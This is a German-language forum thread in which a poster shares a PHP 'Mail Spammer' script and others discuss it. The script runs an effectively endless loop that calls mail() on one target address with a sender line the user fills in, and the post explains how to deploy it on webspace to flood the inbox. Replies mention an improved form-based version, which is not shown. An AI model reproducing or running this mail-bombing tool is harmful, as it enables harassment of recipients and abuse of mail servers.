[PHP] Mail Spammer [PHP]

  • Hi Rt,

    ich will nicht viel um den heißen Brei reden, hab hier nen Spammer für euch.

    [hide]

    PHP
    <?php
    class mail{   public function __construct()   {      for($ok = 1; $ok>=0; $ok++)	  {	     mail("example@hotmail.de", $ok, "Mail Spammer", "From: yourexample@mail.com");		 echo "Die ".$ok.". Mail wurde versendet.		 ";	  }	  	  echo "Mail send";   }      public function ini()   {         }      private static function chars($string)   {      return htmlspecialchars($string);   }
    }
    $mail = new mail();
    ?>

    [/hide]

    Einfach auf nen Webspace packen und die URL besuchen, die Daten müsst ihr natürlich selber ausfüllen.

    Cheers,
    Fabian Winfield


  • Hier mal eine bessere Version, und benutzerfreundlicher.

    Benutzen könnt ihr sie, indem ihr die Formulardaten eingebt.

    Liebe Grüsse Steekarlkani.

    2 Mal editiert, zuletzt von Razer (5. Oktober 2012 um 15:14)


  • Hier mal eine bessere Version, und benutzerfreundlicher.

    Benutzen könnt ihr sie, indem ihr die Formulardaten eingebt.

    Liebe Grüsse Steekarlkani.

    Warum verwendest du in so nem kleinen Script ne Klasse? Hier reicht doch Prozedurales Programmieren aus. Und einen "Spammer" sehe ich in deinem Quelltext nicht. Er schickt nur eine Mail ab.


    :!: FileXs #Lieblingsmod. :!:
    ... still making kids cry since 2015.

  • Warum verwendest du in so nem kleinen Script ne Klasse? Hier reicht doch Prozedurales Programmieren aus. Und einen "Spammer" sehe ich in deinem Quelltext nicht. Er schickt nur eine Mail ab.

    Ich weiss ich habe nur mit Klassen gearbeitet, weil ich es üben wil :=)

    Das reicht doch, er kann mehrere Mails hintereinander abschicken, das ist ja der Sinn eines Spammer's?


    Liebe Grüsse.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!